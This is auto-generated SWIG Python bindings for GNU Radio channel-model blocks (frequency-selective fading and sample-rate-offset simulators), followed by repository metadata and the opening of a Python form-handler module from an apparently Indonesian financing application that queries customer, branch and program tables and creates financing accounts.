pc_output_buffers_full_var(fading_model_sptr self) -> pmt_vector_float """ return _channels_swig.fading_model_sptr_pc_output_buffers_full_var(self, *args) def pc_work_time(self): """pc_work_time(fading_model_sptr self) -> float""" return _channels_swig.fading_model_sptr_pc_work_time(self) def pc_work_time_avg(self): """pc_work_time_avg(fading_model_sptr self) -> float""" return _channels_swig.fading_model_sptr_pc_work_time_avg(self) def pc_work_time_var(self): """pc_work_time_var(fading_model_sptr self) -> float""" return _channels_swig.fading_model_sptr_pc_work_time_var(self) def pc_work_time_total(self): """pc_work_time_total(fading_model_sptr self) -> float""" return _channels_swig.fading_model_sptr_pc_work_time_total(self) def set_processor_affinity(self, *args, **kwargs): """set_processor_affinity(fading_model_sptr self, std::vector< int,std::allocator< int > > const & mask)""" return _channels_swig.fading_model_sptr_set_processor_affinity(self, *args, **kwargs) def unset_processor_affinity(self): """unset_processor_affinity(fading_model_sptr self)""" return _channels_swig.fading_model_sptr_unset_processor_affinity(self) def processor_affinity(self): """processor_affinity(fading_model_sptr self) -> std::vector< int,std::allocator< int > >""" return _channels_swig.fading_model_sptr_processor_affinity(self) def active_thread_priority(self): """active_thread_priority(fading_model_sptr self) -> int""" return _channels_swig.fading_model_sptr_active_thread_priority(self) def thread_priority(self): """thread_priority(fading_model_sptr self) -> int""" return _channels_swig.fading_model_sptr_thread_priority(self) def set_thread_priority(self, *args, **kwargs): """set_thread_priority(fading_model_sptr self, int priority) -> int""" return _channels_swig.fading_model_sptr_set_thread_priority(self, *args, **kwargs) def name(self): """name(fading_model_sptr self) -> std::string""" return _channels_swig.fading_model_sptr_name(self) def symbol_name(self): """symbol_name(fading_model_sptr self) -> std::string""" return _channels_swig.fading_model_sptr_symbol_name(self) def input_signature(self): """input_signature(fading_model_sptr self) -> io_signature_sptr""" return _channels_swig.fading_model_sptr_input_signature(self) def output_signature(self): """output_signature(fading_model_sptr self) -> io_signature_sptr""" return _channels_swig.fading_model_sptr_output_signature(self) def unique_id(self): """unique_id(fading_model_sptr self) -> long""" return _channels_swig.fading_model_sptr_unique_id(self) def to_basic_block(self): """to_basic_block(fading_model_sptr self) -> basic_block_sptr""" return _channels_swig.fading_model_sptr_to_basic_block(self) def check_topology(self, *args, **kwargs): """check_topology(fading_model_sptr self, int ninputs, int noutputs) -> bool""" return _channels_swig.fading_model_sptr_check_topology(self, *args, **kwargs) def alias(self): """alias(fading_model_sptr self) -> std::string""" return _channels_swig.fading_model_sptr_alias(self) def set_block_alias(self, *args, **kwargs): """set_block_alias(fading_model_sptr self, std::string name)""" return _channels_swig.fading_model_sptr_set_block_alias(self, *args, **kwargs) def _post(self, *args, **kwargs): """_post(fading_model_sptr self, swig_int_ptr which_port, swig_int_ptr msg)""" return _channels_swig.fading_model_sptr__post(self, *args, **kwargs) def message_ports_in(self): """message_ports_in(fading_model_sptr self) -> swig_int_ptr""" return _channels_swig.fading_model_sptr_message_ports_in(self) def message_ports_out(self): """message_ports_out(fading_model_sptr self) -> swig_int_ptr""" return _channels_swig.fading_model_sptr_message_ports_out(self) def message_subscribers(self, *args, **kwargs): """message_subscribers(fading_model_sptr self, swig_int_ptr which_port) -> swig_int_ptr""" return _channels_swig.fading_model_sptr_message_subscribers(self, *args, **kwargs) fading_model_sptr_swigregister = _channels_swig.fading_model_sptr_swigregister fading_model_sptr_swigregister(fading_model_sptr) fading_model_sptr.__repr__ = lambda self: "<gr_block %s (%d)>" % (self.name(), self.unique_id()) fading_model = fading_model.make; class selective_fading_model_sptr(object): """Proxy of C++ boost::shared_ptr<(gr::channels::selective_fading_model)> class""" thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag') __repr__ = _swig_repr def __init__(self, *args): """ __init__(boost::shared_ptr<(gr::channels::selective_fading_model)> self) -> selective_fading_model_sptr __init__(boost::shared_ptr<(gr::channels::selective_fading_model)> self, selective_fading_model p) -> selective_fading_model_sptr """ this = _channels_swig.new_selective_fading_model_sptr(*args) try: self.this.append(this) except: self.this = this def __deref__(self): """__deref__(selective_fading_model_sptr self) -> selective_fading_model""" return _channels_swig.selective_fading_model_sptr___deref__(self) __swig_destroy__ = _channels_swig.delete_selective_fading_model_sptr __del__ = lambda self : None; def make(self, *args, **kwargs): """ make(selective_fading_model_sptr self, unsigned int N, float fDTs, bool LOS, float K, int seed, pmt_vector_float delays, pmt_vector_float mags, int ntaps) -> selective_fading_model_sptr fading simulator This block implements a basic fading model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. Constructor Specific Documentation: Build the channel simulator. Args: N : The number of sinusiods to use in simulating the channel; 8 is a good value fDTs : normalized maximum Doppler frequency, fD * Ts LOS : include Line-of-Site path? selects between Rayleigh (NLOS) and Rician (LOS) models K : Rician factor (ratio of the specular power to the scattered power) seed : a random number to seed the noise generators delays : A vector of values the specify the time delay of each impulse mags : A vector of values that specifies the magnitude of each impulse ntaps : The number of filter taps. """ return _channels_swig.selective_fading_model_sptr_make(self, *args, **kwargs) def fDTs(self): """fDTs(selective_fading_model_sptr self) -> float""" return _channels_swig.selective_fading_model_sptr_fDTs(self) def K(self): """K(selective_fading_model_sptr self) -> float""" return _channels_swig.selective_fading_model_sptr_K(self) def step(self): """step(selective_fading_model_sptr self) -> float""" return _channels_swig.selective_fading_model_sptr_step(self) def set_fDTs(self, *args, **kwargs): """set_fDTs(selective_fading_model_sptr self, float fDTs)""" return _channels_swig.selective_fading_model_sptr_set_fDTs(self, *args, **kwargs) def set_K(self, *args, **kwargs): """set_K(selective_fading_model_sptr self, float K)""" return _channels_swig.selective_fading_model_sptr_set_K(self, *args, **kwargs) def set_step(self, *args, **kwargs): """set_step(selective_fading_model_sptr self, float step)""" return _channels_swig.selective_fading_model_sptr_set_step(self, *args, **kwargs) def history(self): """history(selective_fading_model_sptr self) -> unsigned int""" return _channels_swig.selective_fading_model_sptr_history(self) def declare_sample_delay(self, *args): """ declare_sample_delay(selective_fading_model_sptr self, int which, int delay) declare_sample_delay(selective_fading_model_sptr self, unsigned int delay) """ return _channels_swig.selective_fading_model_sptr_declare_sample_delay(self, *args) def sample_delay(self, *args, **kwargs): """sample_delay(selective_fading_model_sptr self, int which) -> unsigned int""" return _channels_swig.selective_fading_model_sptr_sample_delay(self, *args, **kwargs) def output_multiple(self): """output_multiple(selective_fading_model_sptr self) -> int""" return _channels_swig.selective_fading_model_sptr_output_multiple(self) def relative_rate(self): """relative_rate(selective_fading_model_sptr self) -> double""" return _channels_swig.selective_fading_model_sptr_relative_rate(self) def start(self): """start(selective_fading_model_sptr self) -> bool""" return _channels_swig.selective_fading_model_sptr_start(self) def stop(self): """stop(selective_fading_model_sptr self) -> bool""" return _channels_swig.selective_fading_model_sptr_stop(self) def nitems_read(self, *args, **kwargs): """nitems_read(selective_fading_model_sptr self, unsigned int which_input) -> uint64_t""" return _channels_swig.selective_fading_model_sptr_nitems_read(self, *args, **kwargs) def nitems_written(self, *args, **kwargs): """nitems_written(selective_fading_model_sptr self, unsigned int which_output) -> uint64_t""" return _channels_swig.selective_fading_model_sptr_nitems_written(self, *args, **kwargs) def max_noutput_items(self): """max_noutput_items(selective_fading_model_sptr self) -> int""" return _channels_swig.selective_fading_model_sptr_max_noutput_items(self) def set_max_noutput_items(self, *args, **kwargs): """set_max_noutput_items(selective_fading_model_sptr self, int m)""" return _channels_swig.selective_fading_model_sptr_set_max_noutput_items(self, *args, **kwargs) def unset_max_noutput_items(self): """unset_max_noutput_items(selective_fading_model_sptr self)""" return _channels_swig.selective_fading_model_sptr_unset_max_noutput_items(self) def is_set_max_noutput_items(self): """is_set_max_noutput_items(selective_fading_model_sptr self) -> bool""" return _channels_swig.selective_fading_model_sptr_is_set_max_noutput_items(self) def set_min_noutput_items(self, *args, **kwargs): """set_min_noutput_items(selective_fading_model_sptr self, int m)""" return _channels_swig.selective_fading_model_sptr_set_min_noutput_items(self, *args, **kwargs) def min_noutput_items(self): """min_noutput_items(selective_fading_model_sptr self) -> int""" return _channels_swig.selective_fading_model_sptr_min_noutput_items(self) def max_output_buffer(self, *args, **kwargs): """max_output_buffer(selective_fading_model_sptr self, int i) -> long""" return _channels_swig.selective_fading_model_sptr_max_output_buffer(self, *args, **kwargs) def set_max_output_buffer(self, *args): """ set_max_output_buffer(selective_fading_model_sptr self, long max_output_buffer) set_max_output_buffer(selective_fading_model_sptr self, int port, long max_output_buffer) """ return _channels_swig.selective_fading_model_sptr_set_max_output_buffer(self, *args) def min_output_buffer(self, *args, **kwargs): """min_output_buffer(selective_fading_model_sptr self, int i) -> long""" return _channels_swig.selective_fading_model_sptr_min_output_buffer(self, *args, **kwargs) def set_min_output_buffer(self, *args): """ set_min_output_buffer(selective_fading_model_sptr self, long min_output_buffer) set_min_output_buffer(selective_fading_model_sptr self, int port, long min_output_buffer) """ return _channels_swig.selective_fading_model_sptr_set_min_output_buffer(self, *args) def pc_noutput_items(self): """pc_noutput_items(selective_fading_model_sptr self) -> float""" return _channels_swig.selective_fading_model_sptr_pc_noutput_items(self) def pc_noutput_items_avg(self): """pc_noutput_items_avg(selective_fading_model_sptr self) -> float""" return _channels_swig.selective_fading_model_sptr_pc_noutput_items_avg(self) def pc_noutput_items_var(self): """pc_noutput_items_var(selective_fading_model_sptr self) -> float""" return _channels_swig.selective_fading_model_sptr_pc_noutput_items_var(self) def pc_nproduced(self): """pc_nproduced(selective_fading_model_sptr self) -> float""" return _channels_swig.selective_fading_model_sptr_pc_nproduced(self) def pc_nproduced_avg(self): """pc_nproduced_avg(selective_fading_model_sptr self) -> float""" return _channels_swig.selective_fading_model_sptr_pc_nproduced_avg(self) def pc_nproduced_var(self): """pc_nproduced_var(selective_fading_model_sptr self) -> float""" return _channels_swig.selective_fading_model_sptr_pc_nproduced_var(self) def pc_input_buffers_full(self, *args): """ pc_input_buffers_full(selective_fading_model_sptr self, int which) -> float pc_input_buffers_full(selective_fading_model_sptr self) -> pmt_vector_float """ return _channels_swig.selective_fading_model_sptr_pc_input_buffers_full(self, *args) def pc_input_buffers_full_avg(self, *args): """ pc_input_buffers_full_avg(selective_fading_model_sptr self, int which) -> float pc_input_buffers_full_avg(selective_fading_model_sptr self) -> pmt_vector_float """ return _channels_swig.selective_fading_model_sptr_pc_input_buffers_full_avg(self, *args) def pc_input_buffers_full_var(self, *args): """ pc_input_buffers_full_var(selective_fading_model_sptr self, int which) -> float pc_input_buffers_full_var(selective_fading_model_sptr self) -> pmt_vector_float """ return _channels_swig.selective_fading_model_sptr_pc_input_buffers_full_var(self, *args) def pc_output_buffers_full(self, *args): """ pc_output_buffers_full(selective_fading_model_sptr self, int which) -> float pc_output_buffers_full(selective_fading_model_sptr self) -> pmt_vector_float """ return _channels_swig.selective_fading_model_sptr_pc_output_buffers_full(self, *args) def pc_output_buffers_full_avg(self, *args): """ pc_output_buffers_full_avg(selective_fading_model_sptr self, int which) -> float pc_output_buffers_full_avg(selective_fading_model_sptr self) -> pmt_vector_float """ return _channels_swig.selective_fading_model_sptr_pc_output_buffers_full_avg(self, *args) def pc_output_buffers_full_var(self, *args): """ pc_output_buffers_full_var(selective_fading_model_sptr self, int which) -> float pc_output_buffers_full_var(selective_fading_model_sptr self) -> pmt_vector_float """ return _channels_swig.selective_fading_model_sptr_pc_output_buffers_full_var(self, *args) def pc_work_time(self): """pc_work_time(selective_fading_model_sptr self) -> float""" return _channels_swig.selective_fading_model_sptr_pc_work_time(self) def pc_work_time_avg(self): """pc_work_time_avg(selective_fading_model_sptr self) -> float""" return _channels_swig.selective_fading_model_sptr_pc_work_time_avg(self) def pc_work_time_var(self): """pc_work_time_var(selective_fading_model_sptr self) -> float""" return _channels_swig.selective_fading_model_sptr_pc_work_time_var(self) def pc_work_time_total(self): """pc_work_time_total(selective_fading_model_sptr self) -> float""" return _channels_swig.selective_fading_model_sptr_pc_work_time_total(self) def set_processor_affinity(self, *args, **kwargs): """set_processor_affinity(selective_fading_model_sptr self, std::vector< int,std::allocator< int > > const & mask)""" return _channels_swig.selective_fading_model_sptr_set_processor_affinity(self, *args, **kwargs) def unset_processor_affinity(self): """unset_processor_affinity(selective_fading_model_sptr self)""" return _channels_swig.selective_fading_model_sptr_unset_processor_affinity(self) def processor_affinity(self): """processor_affinity(selective_fading_model_sptr self) -> std::vector< int,std::allocator< int > >""" return _channels_swig.selective_fading_model_sptr_processor_affinity(self) def active_thread_priority(self): """active_thread_priority(selective_fading_model_sptr self) -> int""" return _channels_swig.selective_fading_model_sptr_active_thread_priority(self) def thread_priority(self): """thread_priority(selective_fading_model_sptr self) -> int""" return _channels_swig.selective_fading_model_sptr_thread_priority(self) def set_thread_priority(self, *args, **kwargs): """set_thread_priority(selective_fading_model_sptr self, int priority) -> int""" return _channels_swig.selective_fading_model_sptr_set_thread_priority(self, *args, **kwargs) def name(self): """name(selective_fading_model_sptr self) -> std::string""" return _channels_swig.selective_fading_model_sptr_name(self) def symbol_name(self): """symbol_name(selective_fading_model_sptr self) -> std::string""" return _channels_swig.selective_fading_model_sptr_symbol_name(self) def input_signature(self): """input_signature(selective_fading_model_sptr self) -> io_signature_sptr""" return _channels_swig.selective_fading_model_sptr_input_signature(self) def output_signature(self): """output_signature(selective_fading_model_sptr self) -> io_signature_sptr""" return _channels_swig.selective_fading_model_sptr_output_signature(self) def unique_id(self): """unique_id(selective_fading_model_sptr self) -> long""" return _channels_swig.selective_fading_model_sptr_unique_id(self) def to_basic_block(self): """to_basic_block(selective_fading_model_sptr self) -> basic_block_sptr""" return _channels_swig.selective_fading_model_sptr_to_basic_block(self) def check_topology(self, *args, **kwargs): """check_topology(selective_fading_model_sptr self, int ninputs, int noutputs) -> bool""" return _channels_swig.selective_fading_model_sptr_check_topology(self, *args, **kwargs) def alias(self): """alias(selective_fading_model_sptr self) -> std::string""" return _channels_swig.selective_fading_model_sptr_alias(self) def set_block_alias(self, *args, **kwargs): """set_block_alias(selective_fading_model_sptr self, std::string name)""" return _channels_swig.selective_fading_model_sptr_set_block_alias(self, *args, **kwargs) def _post(self, *args, **kwargs): """_post(selective_fading_model_sptr self, swig_int_ptr which_port, swig_int_ptr msg)""" return _channels_swig.selective_fading_model_sptr__post(self, *args, **kwargs) def message_ports_in(self): """message_ports_in(selective_fading_model_sptr self) -> swig_int_ptr""" return _channels_swig.selective_fading_model_sptr_message_ports_in(self) def message_ports_out(self): """message_ports_out(selective_fading_model_sptr self) -> swig_int_ptr""" return _channels_swig.selective_fading_model_sptr_message_ports_out(self) def message_subscribers(self, *args, **kwargs): """message_subscribers(selective_fading_model_sptr self, swig_int_ptr which_port) -> swig_int_ptr""" return _channels_swig.selective_fading_model_sptr_message_subscribers(self, *args, **kwargs) selective_fading_model_sptr_swigregister = _channels_swig.selective_fading_model_sptr_swigregister selective_fading_model_sptr_swigregister(selective_fading_model_sptr) selective_fading_model_sptr.__repr__ = lambda self: "<gr_block %s (%d)>" % (self.name(), self.unique_id()) selective_fading_model = selective_fading_model.make; class sro_model_sptr(object): """Proxy of C++ boost::shared_ptr<(gr::channels::sro_model)> class""" thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag') __repr__ = _swig_repr def __init__(self, *args): """ __init__(boost::shared_ptr<(gr::channels::sro_model)> self) -> sro_model_sptr __init__(boost::shared_ptr<(gr::channels::sro_model)> self, sro_model p) -> sro_model_sptr """ this = _channels_swig.new_sro_model_sptr(*args) try: self.this.append(this) except: self.this = this def __deref__(self): """__deref__(sro_model_sptr self) -> sro_model""" return _channels_swig.sro_model_sptr___deref__(self) __swig_destroy__ = _channels_swig.delete_sro_model_sptr __del__ = lambda self : None; def make(self, *args, **kwargs): """ make(sro_model_sptr self, double sample_rate_hz, double std_dev_hz, double max_dev_hz, double noise_seed=0) -> sro_model_sptr Sample Rate Offset Model. This block implements a model that varies sample rate offset with respect to time by performing a random walk on the interpolation rate. Constructor Specific Documentation: Build the sample rate offset model. Args: sample_rate_hz : Sample rate of the input signal in Hz std_dev_hz : Desired standard deviation of the random walk process every sample in Hz max_dev_hz : Maximum sample rate deviation from zero in Hz. noise_seed : A random number generator seed for the noise source. """ return _channels_swig.sro_model_sptr_make(self, *args, **kwargs) def set_std_dev(self, *args, **kwargs): """set_std_dev(sro_model_sptr self, double _dev)""" return _channels_swig.sro_model_sptr_set_std_dev(self, *args, **kwargs) def set_max_dev(self, *args, **kwargs): """set_max_dev(sro_model_sptr self, double _dev)""" return _channels_swig.sro_model_sptr_set_max_dev(self, *args, **kwargs) def set_samp_rate(self, *args, **kwargs): """set_samp_rate(sro_model_sptr self, double _rate)""" return _channels_swig.sro_model_sptr_set_samp_rate(self, *args, **kwargs) def std_dev(self): """std_dev(sro_model_sptr self) -> double""" return _channels_swig.sro_model_sptr_std_dev(self) def max_dev(self): """max_dev(sro_model_sptr self) -> double""" return _channels_swig.sro_model_sptr_max_dev(self) def samp_rate(self): """samp_rate(sro_model_sptr self) -> double""" return _channels_swig.sro_model_sptr_samp_rate(self) def history(self): """history(sro_model_sptr self) -> unsigned int""" return _channels_swig.sro_model_sptr_history(self) def declare_sample_delay(self, *args): """ declare_sample_delay(sro_model_sptr self, int which, int delay) declare_sample_delay(sro_model_sptr self, unsigned int delay) """ return _channels_swig.sro_model_sptr_declare_sample_delay(self, *args) def sample_delay(self, *args, **kwargs): """sample_delay(sro_model_sptr self, int which) -> unsigned int""" return _channels_swig.sro_model_sptr_sample_delay(self, *args, **kwargs) def output_multiple(self): """output_multiple(sro_model_sptr self) -> int""" return _channels_swig.sro_model_sptr_output_multiple(self) def relative_rate(self): """relative_rate(sro_model_sptr self) -> double""" return _channels_swig.sro_model_sptr_relative_rate(self) def start(self): """start(sro_model_sptr self) -> bool""" return _channels_swig.sro_model_sptr_start(self) def stop(self): """stop(sro_model_sptr self) -> bool""" return _channels_swig.sro_model_sptr_stop(self) def nitems_read(self, *args, **kwargs): """nitems_read(sro_model_sptr self, unsigned int which_input) -> uint64_t""" return _channels_swig.sro_model_sptr_nitems_read(self, *args, **kwargs) def nitems_written(self, *args, **kwargs): """nitems_written(sro_model_sptr self, unsigned int which_output) -> uint64_t""" return _channels_swig.sro_model_sptr_nitems_written(self, *args, **kwargs) def max_noutput_items(self): """max_noutput_items(sro_model_sptr self) -> int""" return _channels_swig.sro_model_sptr_max_noutput_items(self) def set_max_noutput_items(self, *args, **kwargs): """set_max_noutput_items(sro_model_sptr self, int m)""" return _channels_swig.sro_model_sptr_set_max_noutput_items(self, *args, **kwargs) def unset_max_noutput_items(self): """unset_max_noutput_items(sro_model_sptr self)""" return _channels_swig.sro_model_sptr_unset_max_noutput_items(self) def is_set_max_noutput_items(self): """is_set_max_noutput_items(sro_model_sptr self) -> bool""" return _channels_swig.sro_model_sptr_is_set_max_noutput_items(self) def set_min_noutput_items(self, *args, **kwargs): """set_min_noutput_items(sro_model_sptr self, int m)""" return _channels_swig.sro_model_sptr_set_min_noutput_items(self, *args, **kwargs) def min_noutput_items(self): """min_noutput_items(sro_model_sptr self) -> int""" return _channels_swig.sro_model_sptr_min_noutput_items(self) def max_output_buffer(self, *args, **kwargs): """max_output_buffer(sro_model_sptr self, int i) -> long""" return _channels_swig.sro_model_sptr_max_output_buffer(self, *args, **kwargs) def set_max_output_buffer(self, *args): """ set_max_output_buffer(sro_model_sptr self, long max_output_buffer) set_max_output_buffer(sro_model_sptr self, int port, long max_output_buffer) """ return _channels_swig.sro_model_sptr_set_max_output_buffer(self, *args) def min_output_buffer(self, *args, **kwargs): """min_output_buffer(sro_model_sptr self, int i) -> long""" return _channels_swig.sro_model_sptr_min_output_buffer(self, *args, **kwargs) def set_min_output_buffer(self, *args): """ set_min_output_buffer(sro_model_sptr self, long min_output_buffer) set_min_output_buffer(sro_model_sptr self, int port, long min_output_buffer) """ return _channels_swig.sro_model_sptr_set_min_output_buffer(self, *args) def pc_noutput_items(self): """pc_noutput_items(sro_model_sptr self) -> float""" return _channels_swig.sro_model_sptr_pc_noutput_items(self) def pc_noutput_items_avg(self): """pc_noutput_items_avg(sro_model_sptr self) -> float""" return _channels_swig.sro_model_sptr_pc_noutput_items_avg(self) def pc_noutput_items_var(self): """pc_noutput_items_var(sro_model_sptr self) -> float""" return _channels_swig.sro_model_sptr_pc_noutput_items_var(self) def pc_nproduced(self): """pc_nproduced(sro_model_sptr self) -> float""" return _channels_swig.sro_model_sptr_pc_nproduced(self) def pc_nproduced_avg(self): """pc_nproduced_avg(sro_model_sptr self) -> float""" return _channels_swig.sro_model_sptr_pc_nproduced_avg(self) def pc_nproduced_var(self): """pc_nproduced_var(sro_model_sptr self) -> float""" return _channels_swig.sro_model_sptr_pc_nproduced_var(self) def pc_input_buffers_full(self, *args): """ pc_input_buffers_full(sro_model_sptr self, int which) -> float pc_input_buffers_full(sro_model_sptr self) -> pmt_vector_float """ return _channels_swig.sro_model_sptr_pc_input_buffers_full(self, *args) def pc_input_buffers_full_avg(self, *args): """ pc_input_buffers_full_avg(sro_model_sptr self, int which) -> float pc_input_buffers_full_avg(sro_model_sptr self) -> pmt_vector_float """ return _channels_swig.sro_model_sptr_pc_input_buffers_full_avg(self, *args) def pc_input_buffers_full_var(self, *args): """ pc_input_buffers_full_var(sro_model_sptr self, int which) -> float pc_input_buffers_full_var(sro_model_sptr self) -> pmt_vector_float """ return _channels_swig.sro_model_sptr_pc_input_buffers_full_var(self, *args) def pc_output_buffers_full(self, *args): """ pc_output_buffers_full(sro_model_sptr self, int which) -> float pc_output_buffers_full(sro_model_sptr self) -> pmt_vector_float """ return _channels_swig.sro_model_sptr_pc_output_buffers_full(self, *args) def pc_output_buffers_full_avg(self, *args): """ pc_output_buffers_full_avg(sro_model_sptr self, int which) -> float pc_output_buffers_full_avg(sro_model_sptr self) -> pmt_vector_float """ return _channels_swig.sro_model_sptr_pc_output_buffers_full_avg(self, *args) def pc_output_buffers_full_var(self, *args): """ pc_output_buffers_full_var(sro_model_sptr self, int which) -> float pc_output_buffers_full_var(sro_model_sptr self) -> pmt_vector_float """ return _channels_swig.sro_model_sptr_pc_output_buffers_full_var(self, *args) def pc_work_time(self): """pc_work_time(sro_model_sptr self) -> float""" return _channels_swig.sro_model_sptr_pc_work_time(self) def pc_work_time_avg(self): """pc_work_time_avg(sro_model_sptr self) -> float""" return _channels_swig.sro_model_sptr_pc_work_time_avg(self) def pc_work_time_var(self): """pc_work_time_var(sro_model_sptr self) -> float""" return _channels_swig.sro_model_sptr_pc_work_time_var(self) def pc_work_time_total(self): """pc_work_time_total(sro_model_sptr self) -> float""" return _channels_swig.sro_model_sptr_pc_work_time_total(self) def set_processor_affinity(self, *args, **kwargs): """set_processor_affinity(sro_model_sptr self, std::vector< int,std::allocator< int > > const & mask)""" return _channels_swig.sro_model_sptr_set_processor_affinity(self, *args, **kwargs) def unset_processor_affinity(self): """unset_processor_affinity(sro_model_sptr self)""" return _channels_swig.sro_model_sptr_unset_processor_affinity(self) def processor_affinity(self): """processor_affinity(sro_model_sptr self) -> std::vector< int,std::allocator< int > >""" return _channels_swig.sro_model_sptr_processor_affinity(self) def active_thread_priority(self): """active_thread_priority(sro_model_sptr self) -> int""" return _channels_swig.sro_model_sptr_active_thread_priority(self) def thread_priority(self): """thread_priority(sro_model_sptr self) -> int""" return _channels_swig.sro_model_sptr_thread_priority(self) def set_thread_priority(self, *args, **kwargs): """set_thread_priority(sro_model_sptr self, int priority) -> int""" return _channels_swig.sro_model_sptr_set_thread_priority(self, *args, **kwargs) def name(self): """name(sro_model_sptr self) -> std::string""" return _channels_swig.sro_model_sptr_name(self) def symbol_name(self): """symbol_name(sro_model_sptr self) -> std::string""" return _channels_swig.sro_model_sptr_symbol_name(self) def input_signature(self): """input_signature(sro_model_sptr self) -> io_signature_sptr""" return _channels_swig.sro_model_sptr_input_signature(self) def output_signature(self): """output_signature(sro_model_sptr self) -> io_signature_sptr""" return _channels_swig.sro_model_sptr_output_signature(self) def unique_id(self): """unique_id(sro_model_sptr self) -> long""" return _channels_swig.sro_model_sptr_unique_id(self) def to_basic_block(self): """to_basic_block(sro_model_sptr self) -> basic_block_sptr""" return _channels_swig.sro_model_sptr_to_basic_block(self) def check_topology(self, *args, **kwargs): """check_topology(sro_model_sptr self, int ninputs, int noutputs) -> bool""" return _channels_swig.sro_model_sptr_check_topology(self, *args, **kwargs) def alias(self): """alias(sro_model_sptr self) -> std::string""" return _channels_swig.sro_model_sptr_alias(self) def set_block_alias(self, *args, **kwargs): """set_block_alias(sro_model_sptr self, std::string name)""" return _channels_swig.sro_model_sptr_set_block_alias(self, *args, **kwargs) def _post(self, *args, **kwargs): """_post(sro_model_sptr self, swig_int_ptr which_port, swig_int_ptr msg)""" return _channels_swig.sro_model_sptr__post(self, *args, **kwargs) def message_ports_in(self): """message_ports_in(sro_model_sptr self) -> swig_int_ptr""" return _channels_swig.sro_model_sptr_message_ports_in(self) def message_ports_out(self): """message_ports_out(sro_model_sptr self) -> swig_int_ptr""" return _channels_swig.sro_model_sptr_message_ports_out(self) def message_subscribers(self, *args, **kwargs): """message_subscribers(sro_model_sptr self, swig_int_ptr which_port) -> swig_int_ptr""" return _channels_swig.sro_model_sptr_message_subscribers(self, *args, **kwargs) sro_model_sptr_swigregister = _channels_swig.sro_model_sptr_swigregister sro_model_sptr_swigregister(sro_model_sptr) sro_model_sptr.__repr__ = lambda self: "<gr_block %s (%d)>" % (self.name(), self.unique_id()) sro_model = sro_model.make;
UTF-8
Python
false
false
2,014
2,267,742,778,828
73bc75f31b2f3c7744b9c20cc04853dece4ff286
9b1823b73a03f7517c2039ccdb3889300bacf455
/dialogs/AQH/fDroppingDanaAQH_data.py
60560242589757204a65140768a83754a66f5fe5
[]
no_license
ihsansolusi/BMMProgram
https://github.com/ihsansolusi/BMMProgram
d50eb6807abad265544a6c855888e6d9cef3a864
97428d5cf3f61256a8bc1ced551da611a8884b50
refs/heads/master
2016-03-31T02:51:25.931005
2013-09-12T23:38:15
2013-09-12T23:38:15
2,272,273
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import com.ihsan.foundation.pobjecthelper as phelper import time, sys, os def FormSetDataEx(uideflist, parameter): config =uideflist.config helper = phelper.PObjectHelper(config) if parameter.DatasetCount != 0: CustomerId=parameter.FirstRecord.CustId Cust ="PObj:CustomerPersonal#CustomerId=%s" % CustomerId uideflist.SetData('uipart', Cust) key=parameter.FirstRecord.key uideflist.SetData('uipropose', key) def OnSetData(sender): config =sender.UIDefList.config helper = phelper.PObjectHelper(config) Data = sender.ActiveRecord CustId = Data.CustomerId sSQL = "select b.*,branchname from branch a, mustahiqaqh b, mustahiq c " sSQL += "where a.branchcode=b.branchcode and b.mustahiqid=c.mustahiqid and c.customerid = %s" % CustId cabang = config.CreateSQL(sSQL).rawresult Data.DepositBalance = cabang.DepositBalance Data.SetFieldByName('LBranch.BranchCode', cabang.BranchCode) Data.SetFieldByName('LBranch.BranchName', cabang.BranchName) Data.StatusKaryawan = cabang.employeestatus Data.Jabatan = cabang.position Data.CoupleName = cabang.CoupleName Data.CoupleJob = cabang.CoupleJob Data.MustahiqId = cabang.MustahiqId cSQL = "select b.accountno,c.accountname,b.realbalance,c.balance, a.*,d.* from programaqh a, productaccount b, transactionaccount c, product d " cSQL += "WHERE a.productid=b.productid and a.productid=d.productid and b.accountno=c.accountno and a.branchcode='%s'" % cabang.BranchCode plafond = config.CreateSQL(cSQL).rawresult Data.accountno = plafond.accountno Data.accountname = plafond.accountname uip = sender.uideflist.uiprogram rec = uip.Dataset.AddRecord() rec.ProductName =plafond.productname rec.MaxPlafond =plafond.MaxPlafond rec.MaxDropping =plafond.MaxDropping rec.SisaPlafond =plafond.balance rec.Saldo =plafond.realbalance def Simpan(config, parameter, returnpacket): status = returnpacket.CreateValues( ['IsErr',0], ['ErrMessage',''], ) recParam = parameter.uipart.GetRecord(0) rec = parameter.uipropose.GetRecord(0) Cabang =recParam.GetFieldByName('LBranch.BranchCode') UserLogin = config.SecurityContext.InitUser TerminalUser = config.SecurityContext.InitIP config.BeginTransaction() param = {'tipe':'AQH'} param2 = {'tipe':'T.AQH.'} try: helper = phelper.PObjectHelper(config) simpanPengajuan = helper.GetObject('AQHPropose',rec.AQHProposeId) simpanPengajuan.ProposeStatus =rec.Status simpanPengajuan.Description =rec.alasan if rec.Status == 'R': pSQL = "select a.productid,accountno,c.productname from programaqh a, productaccount b, product c " pSQL += "where a.productid=c.productid and a.productid=b.productid and branchcode='%s'" % Cabang Prog = config.CreateSQL(pSQL).rawresult if Prog.accountno in (None,''): raise '','Program belum mempunyai rekening program..' sSQL = "select productid,status from mustahiqproduct where mustahiqid= %s " % rec.MustahiqId MP = config.CreateSQL(sSQL).rawresult if MP.productid in (None,0): simpanMP = helper.CreatePObject('MustahiqProduct',param) simpanMP.ProductId = Prog.productid simpanMP.MustahiqId = rec.MustahiqId simpanMP.MustahiqExtField = Cabang simpanMP.Status = 'A' productid = Prog.productid else: if MP.status =='A': raise '','Pemohon AQH '+recParam.CustomerName+' Masih memiliki kartu yang masih aktif' simpanMP = helper.GetObject('MustahiqProduct', (MP.productid,rec.MustahiqId)) if simpanMP.productid != Prog.productid: simpanMP = helper.CreatePObject('MustahiqProduct',param) simpanMP.ProductId = Prog.productid simpanMP.MustahiqId = rec.MustahiqId simpanMP.MustahiqExtField = Cabang simpanMP.Status = 'A' productid = simpanMP.productid oAccount = helper.CreatePObject('FinancingAccount') oAccount.AccountNo = '%s-%d' % (rec.AccountNo,rec.AQHProposeId) oAccount.AccountName = recParam.CustomerName oAccount.AccountStatus = 'O' oAccount.BaseAmount = rec.ProposePlafond oAccount.BaseBalance = rec.ProposePlafond oAccount.MustahiqId = rec.MustahiqId oAccount.ProductId = productid oAccount.Balance = rec.ProposePlafond oAccount.Currency_Code = '001' 